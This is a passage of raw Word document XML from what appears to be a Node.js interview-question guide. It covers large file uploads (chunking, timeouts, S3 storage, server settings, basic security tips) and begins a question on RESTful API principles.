    <w:p w14:paraId="4608FEDF" w14:textId="77777777" w:rsidR="00987212" w:rsidRPr="00DA2F32" w:rsidRDefault="00987212" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="141"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Server-Side</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62269617" w14:textId="77777777" w:rsidR="00987212" w:rsidRPr="00DA2F32" w:rsidRDefault="00987212" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="141"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Receive each chunk and append it to the final file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D58CB77" w14:textId="77777777" w:rsidR="00987212" w:rsidRPr="00DA2F32" w:rsidRDefault="00987212" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="141"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Track the chunk number and total chunks to ensure completeness.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52828FA3"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3. Handle Timeouts and Errors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CD4058" w14:textId="77777777" w:rsidR="00987212" w:rsidRPr="00DA2F32" w:rsidRDefault="00987212" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Large file uploads can take time, so it's important to adjust server timeouts and handle potential errors gracefully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2A71E5"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014FD4E9"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server = app.listen(3000, () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA79082"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console.log('Server listening on port 3000');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5FCF54"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FA19185"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04588A84"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Increase the default timeout (e.g., to 10 minutes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C68C58"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lastRenderedPageBreak/>
        <w:t>server.setTimeout(10 * 60 * 1000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0302F420"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4. Consider Using External Storage Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235C0F2C" w14:textId="77777777" w:rsidR="00987212" w:rsidRPr="00DA2F32" w:rsidRDefault="00987212" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>For extremely large file uploads, consider using an external storage service like AWS S3, Google Cloud Storage, or Azure Blob Storage. These services provide robust handling of large files with built-in chunking, retries, and scalability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBED086"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Example using AWS S3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C525E60" w14:textId="77777777" w:rsidR="00987212" w:rsidRPr="00DA2F32" w:rsidRDefault="00987212" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="142"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Install AWS SDK</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735E3535" w14:textId="77777777" w:rsidR="00987212" w:rsidRPr="00DA2F32" w:rsidRDefault="00987212" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>npm install aws-sdk multer-s3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002C32FC" w14:textId="77777777" w:rsidR="00987212" w:rsidRPr="00DA2F32" w:rsidRDefault="00987212" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="142"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Upload to S3</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6487B378"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AWS = require('aws-sdk');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FCFE60"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multerS3 = require('multer-s3');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B7856A"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7385F37E"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s3 = new AWS.S3();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DB2D9E"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upload = multer({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1772088D"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storage: multerS3({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBED055"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s3: s3,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4B0ED2"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bucket: 'my-bucket',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D843BC5"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key: function (req, file, cb) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F5D838"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cb(null, file.originalname);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4674CC83"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9D69436"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8008E33"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85BDEF2"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784A808"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app.post('/upload', upload.single('file'), (req, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572F04A2"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res.status(200).send('File uploaded to S3 successfully');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D1B0DD" w14:textId="77777777" w:rsidR="00987212" w:rsidRPr="00DA2F32" w:rsidRDefault="0098721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47AEB59"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5. Optimize Server Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA37FBD" w14:textId="33D4EC57" w:rsidR="00987212" w:rsidRPr="00DA2F32" w:rsidRDefault="00987212" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="143"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Increase HTTP Header and Body Limits</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Configure your server (e.g., Nginx, Apache) to handle large request bodies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D68374D" w14:textId="77777777" w:rsidR="00987212" w:rsidRPr="00DA2F32" w:rsidRDefault="00987212" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="143"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use a Reverse Proxy</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Deploy a reverse proxy like Nginx to manage incoming requests and handle load balancing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721E3CF1"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6. Security Considerations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D14DDB1" w14:textId="77777777" w:rsidR="00987212" w:rsidRPr="00DA2F32" w:rsidRDefault="00987212" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="144"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Rate Limiting</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Prevent abuse by setting rate limits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748997C1" w14:textId="77777777" w:rsidR="00987212" w:rsidRPr="00DA2F32" w:rsidRDefault="00987212" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="144"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Validation</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Validate file types and sizes before processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8FB9C1" w14:textId="77777777" w:rsidR="00987212" w:rsidRPr="00DA2F32" w:rsidRDefault="00987212" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="144"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Authentication</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Ensure the upload endpoint is secure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD5F7A7" w14:textId="77777777" w:rsidR="00987212" w:rsidRPr="00DA2F32" w:rsidRDefault="00987212" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE30BA2" w14:textId="77777777" w:rsidR="00987212" w:rsidRPr="00DA2F32" w:rsidRDefault="00987212" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6931B336"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16" w:name="_Toc178383199"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Q16. What is RESTful API, and how to create it using Node.js?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="622FCED9"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rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>RESTful API</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Representational State Transfer) is an architectural style for building web services that follow a set of principles and constraints. RESTful APIs are designed to be stateless, use standard HTTP methods (GET, POST, PUT, DELETE, etc.), and operate over HTTP/HTTPS. They allow communication between a client (such as a web browser or mobile app) and a server by using URLs (or endpoints) to access and manipulate resources, typically represented as JSON or XML data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1F3D10" w14:textId="77777777" w:rsidR="00A17EE8" w:rsidRPr="00DA2F32" w:rsidRDefault="00A17EE8" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Key Principles of a RESTful API:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C766DAC" w14:textId="77777777" w:rsidR="00A17EE8" w:rsidRPr="00DA2F32" w:rsidRDefault="00A17EE8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="145"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Stateless</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Each request from a client to a server must contain all the information needed to understand and process the request. The server does not store any client context between requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765A37AC" w14:textId="77777777" w:rsidR="00A17EE8" w:rsidRPr="00DA2F32" w:rsidRDefault="00A17EE8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="145"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Client-Server Separation</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: The client and server are separated, allowing them to evolve independently. The client does not need to know the server implementation details and vice versa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E16B9AA" w14:textId="77777777" w:rsidR="00A17EE8" w:rsidRPr="00DA2F32" w:rsidRDefault="00A17EE8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="145"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Resource-Based</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Everything is considered a resource, identified by a URI (Uniform Resource Identifier). For example, /users, /orders, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DDBC72" w14:textId="77777777" w:rsidR="00A17EE8" w:rsidRPr="00DA2F32" w:rsidRDefault="00A17EE8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="145"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use of Standard HTTP Methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D934DD5" w14:textId="77777777" w:rsidR="00A17EE8" w:rsidRPr="00DA2F32" w:rsidRDefault="00A17EE8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="145"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Retrieve data from the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171DDE37" w14:textId="77777777" w:rsidR="00A17EE8" w:rsidRPr="00DA2F32" w:rsidRDefault="00A17EE8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="145"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Create a new resource on the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE2A4F1" w14:textId="77777777" w:rsidR="00A17EE8" w:rsidRPr="00DA2F32" w:rsidRDefault="00A17EE8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="145"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>PUT</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Update an existing resource on the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DE9DE5" w14:textId="77777777" w:rsidR="00A17EE8" w:rsidRPr="00DA2F32" w:rsidRDefault="00A17EE8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="145"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>DELETE</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Delete a resource on the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5C4D35" w14:textId="77777777" w:rsidR="00A17EE8" w:rsidRPr="00DA2F32" w:rsidRDefault="00A17EE8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
